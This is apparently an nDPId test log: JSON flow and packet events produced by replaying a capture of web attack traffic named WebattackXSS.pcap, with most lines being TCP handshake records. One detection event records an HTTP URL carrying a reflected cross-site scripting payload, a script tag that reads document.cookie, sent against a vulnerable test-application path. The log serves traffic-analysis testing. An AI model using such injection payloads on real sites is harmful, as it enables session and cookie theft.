+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LWRAAD4GmGysEAABwKgKMoAsAFA\/CD4fAAAAAKACchBMqQAAAgQFtAQCCAoBPBN7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6925,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":2,"flow_last_seen":1499347798713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347798713,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgCwp5bxCPwg+IKAScSB+iwAAAgQFtAQCCAoD5eTvATwTewEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":3,"flow_last_seen":1499347798714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347798714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LWVAAD4GmHOsEAABwKgKMoAsAFA\/CD4gKeW8Q4AQAOUdkwAAAQEICgE8E3sD5eTv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347801271,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347801271,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZRhAAD4GYLisEAABwKgKMoBGAFBeRnDiAAAAAKACchD4DgAAAgQFtAQCCAoBPBX6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":2,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347801271,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgEYSjN1bXkZw46AScSAdsQAAAgQFtAQCCAoD5edvATwV+gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":3,"flow_last_seen":1499347801271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347801271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZRlAAD4GYL+sEAABwKgKMoBGAFBeRnDjEozdXIAQAOW8uAAAAQEICgE8FfoD5edv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347802549,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802549,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347805119,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347805119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32878,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZmVAAD4GX2usEAABwKgKMoBuAFBq0H\/ZAAAAAKACchDYowAAAgQFtAQCCAoBPBm8AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":2,"flow_last_seen":1499347805119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347805119,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgG5Z9D1oatB\/2qAScSBTDwAAAgQFtAQCCAoD5esxATwZvAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":3,"flow_last_seen":1499347805120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347805120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZmZAAD4GX3KsEAABwKgKMoBuAFBq0H\/aWfQ9aYAQAOXyFgAAAQEICgE8GbwD5esx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347806390,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347806390,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AxtAAD4GwrWsEAABwKgKMoB8AFC+iBnhAAAAAKACchDplwAAAgQFtAQCCAoBPBr6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":2,"flow_last_seen":1499347806390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347806390,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgHy7zo2dvogZ4qAScSCwtQAAAgQFtAQCCAoD5exvATwa+gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6988,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":3,"flow_last_seen":1499347806391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347806391,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AxxAAD4GwrysEAABwKgKMoB8AFC+iBniu86NnoAQAOVPvQAAAQEICgE8GvoD5exv"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347807664,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347807664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6997,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PG1AAD4GiWOsEAABwKgKMoCKAFAzSiBUAAAAAKACchBtFgAAAgQFtAQCCAoBPBw5AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":2,"flow_last_seen":1499347807664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347807664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgIqXGWCRM0ogVaAScSCEtwAAAgQFtAQCCAoD5e2tATwcOQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":3,"flow_last_seen":1499347807665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347807665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PG5AAD4GiWqsEAABwKgKMoCKAFAzSiBVlxlgkoAQAOUjvwAAAQEICgE8HDkD5e2t"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347810243,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347810243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7015,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+YpAAD4GzEWsEAABwKgKMoCkAFCAVuc3AAAAAKACchBWiAAAAgQFtAQCCAoBPB69AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7016,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":2,"flow_last_seen":1499347810243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347810243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgKT1xLjSgFbnOKAScSC0twAAAgQFtAQCCAoD5fAyATwevQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7017,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":3,"flow_last_seen":1499347810244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347810244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+YtAAD4GzEysEAABwKgKMoCkAFCAVuc49cS404AQAOVTvgAAAQEICgE8Hr4D5fAy"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347811525,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347811525,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} 